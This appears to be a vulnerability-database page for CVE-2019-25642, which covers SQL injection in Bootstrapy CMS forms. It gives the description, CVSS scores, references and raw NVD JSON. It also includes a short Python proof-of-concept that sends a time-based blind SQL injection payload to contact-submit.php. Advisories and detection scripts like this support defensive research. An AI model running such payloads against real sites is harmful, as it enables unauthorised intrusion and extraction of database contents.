CVE-2019-25642

Description

Bootstrapy CMS contains multiple SQL injection vulnerabilities that allow unauthenticated attackers to execute arbitrary SQL queries by injecting malicious code through POST parameters. Attackers can inject SQL payloads into the thread_id parameter of forum-thread.php, the subject parameter of contact-submit.php, the post-id parameter of post-new-submit.php, and the thread-id parameter to extract sensitive database information or cause denial of service.

CVSS Details

CVSS Score

8.2

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Bootstrapy CMS (Latest Version)

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests def check_sqli(url): # Target endpoint where the vulnerability exists target = f"{url}/contact-submit.php" # Malicious payload for SQL Injection # This payload attempts to cause a time delay (blind SQL injection) payload = "' AND (SELECT SLEEP(5))-- -" # POST data parameters vulnerable to injection data = { "subject": payload, "message": "Test Message", "email": "[email protected]" } try: print(f"[+] Sending payload to {target}...") response = requests.post(target, data=data, timeout=10) # Check if the response time indicates a successful injection # If the server sleeps for 5 seconds, the response time will be > 5s if response.elapsed.total_seconds() >= 5: print("[!] Vulnerability confirmed! The application is vulnerable to SQL Injection.") else: print("[-] Vulnerability not detected or patched.") except requests.exceptions.RequestException as e: print(f"[Error] Request failed: {e}") if __name__ == "__main__": # Replace with the actual target URL target_url = "http://localhost/bootstrapy" check_sqli(target_url)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2019-25642
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2019-25642
[3] CVE Details https://www.cvedetails.com/cve/CVE-2019-25642/
[4] VulDB https://vuldb.com/cve/CVE-2019-25642
[5] http://bootstrapy.com
[6] https://www.exploit-db.com/exploits/46590
[7] https://www.vulncheck.com/advisories/bootstrapy-cms-lastest-multiple-sql-injection-via-forum-and-contact-modules

Raw JSON Data

JSON

{"cve": {"id": "CVE-2019-25642", "sourceIdentifier": "[email protected]", "published": "2026-03-24T12:16:06.450", "lastModified": "2026-05-01T15:21:32.393", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Bootstrapy CMS contains multiple SQL injection vulnerabilities that allow unauthenticated attackers to execute arbitrary SQL queries by injecting malicious code through POST parameters. Attackers can inject SQL payloads into the thread_id parameter of forum-thread.php, the subject parameter of contact-submit.php, the post-id parameter of post-new-submit.php, and the thread-id parameter to extract sensitive database information or cause denial of service."}, {"lang": "es", "value": "Bootstrapy CMS contiene múltiples vulnerabilidades de inyección SQL que permiten a atacantes no autenticados ejecutar consultas SQL arbitrarias inyectando código malicioso a través de parámetros POST. Los atacantes pueden inyectar cargas útiles SQL en el parámetro thread_id de forum-thread.php, el parámetro subject de contact-submit.php, el parámetro post-id de post-new-submit.php, y el parámetro thread-id para extraer información sensible de la base de datos o causar denegación de servicio."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N", "baseScore": 8.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 4.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-89"}]}], "references": [{"url": "http://bootstrapy.com", "source": "[email protected]"}, {"url": "https://www.exploit-db.com/exploits/46590", "source": "[email protected]"}, {"url": "https://www.vulncheck.com/advisories/bootstrapy-cms-lastest-multiple-sql-injection-via-forum-and-contact-modules", "source": "[email protected]"}]}}